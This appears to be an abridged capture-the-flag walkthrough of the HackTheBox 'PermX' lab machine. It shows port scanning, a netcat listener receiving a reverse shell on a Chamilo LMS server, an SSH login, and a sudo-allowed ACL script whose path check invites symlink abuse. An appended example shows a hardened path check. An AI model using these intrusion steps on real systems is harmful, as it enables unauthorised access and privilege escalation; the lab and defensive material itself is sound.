└──╼ [★]$ nmap -sV 10.10.11.23
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 12:35 CDT
Nmap scan report for 10.10.11.23
Host is up (0.0022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds
└──╼ [★]$ echo "10.10.11.23 www.permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 www.permx.htb
┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-mn1y31pgmb]─[~]
└──╼ [★]$ echo "10.10.11.23 lms.permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 lms.permx.htb
www is indeed just the home page, but lms shows a login page:
Let's look up what this cool thing is:
Chamilo is a free software (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and the building of a network of services providers and software contributors.
└──╼ [★]$ nc -tlnp 4444
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$
└──╼ [★]$ ssh mtz@10.10.11.23
The authenticity of host '10.10.11.23 (10.10.11.23)' can't be established.
ED25519 key fingerprint is SHA256:u9/wL+62dkDBqxAG3NyMhz/2FTBJlmVC1Y1bwaNLqGA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.23' (ED25519) to the list of known hosts.
mtz@10.10.11.23's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64)

 System information as of Sun Aug 11 06:09:41 PM UTC 2024

  System load:           0.0
  Usage of /:            59.7% of 7.19GB
  Memory usage:          23%
  Swap usage:            0%
  Processes:             247
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.23
  IPv6 address for eth0: dead:beef::250:56ff:feb9:c054

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Aug 11 15:49:24 2024 from 10.10.14.21
mtz@permx:~$
mtz@permx:~$ ls
sudoers  user.txt
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh
mtz@permx:~$ ls -l /opt/acl.sh
-rwxr-xr-x 1 root root 419 Jun 5 11:58 /opt/acl.sh
mtz@permx:~$ cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi
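
The path check in /opt/acl.sh above compares the argument as text, and `[ -f ]` follows symbolic links, so neither test says where the path actually resolves. The following is an added example (not part of the original writeup or the script on the box) of a check that resolves the path first; `check_target`, `demo` and the temporary directory tree are hypothetical names and constructed sample data.

```shell
#!/bin/bash
# Added example, not the script from the box. check_target and demo are
# hypothetical names; the base directory is passed in rather than hard-coded.

# check_target BASE TARGET
# Succeeds (and prints the resolved path) only if TARGET is a regular file,
# is not itself a symlink, and resolves to a location under BASE.
check_target() {
    local base resolved
    base=$(readlink -f -- "$1") || return 1
    [ -L "$2" ] && return 1                      # final component is a symlink
    resolved=$(readlink -f -- "$2") || return 1  # follow links, collapse ".."
    case "$resolved" in
        "$base"/*) ;;                            # resolved path is under BASE
        *) return 1 ;;
    esac
    [ -f "$resolved" ] || return 1               # existing regular file
    printf '%s\n' "$resolved"
}

# demo: build a constructed directory tree and report the verdict per case.
demo() {
    local tmp name
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/home/user/docs" "$tmp/outside"
    echo data > "$tmp/home/user/docs/notes.txt"
    echo secret > "$tmp/outside/config"
    ln -s "$tmp/outside/config" "$tmp/home/user/link"   # file symlink
    ln -s "$tmp/outside" "$tmp/home/user/dirlink"       # directory symlink
    for name in docs/notes.txt link dirlink/config docs; do
        if check_target "$tmp/home/user" "$tmp/home/user/$name" >/dev/null; then
            echo "$name: allowed"
        else
            echo "$name: denied"
        fi
    done
    rm -rf "$tmp"
}

demo
```

Checking a path and then acting on it are still two separate steps, so a caller should operate on the resolved path that `check_target` prints rather than on the original argument. A helper that runs as root over a directory the calling user can write to remains exposed to changes made between the check and the use.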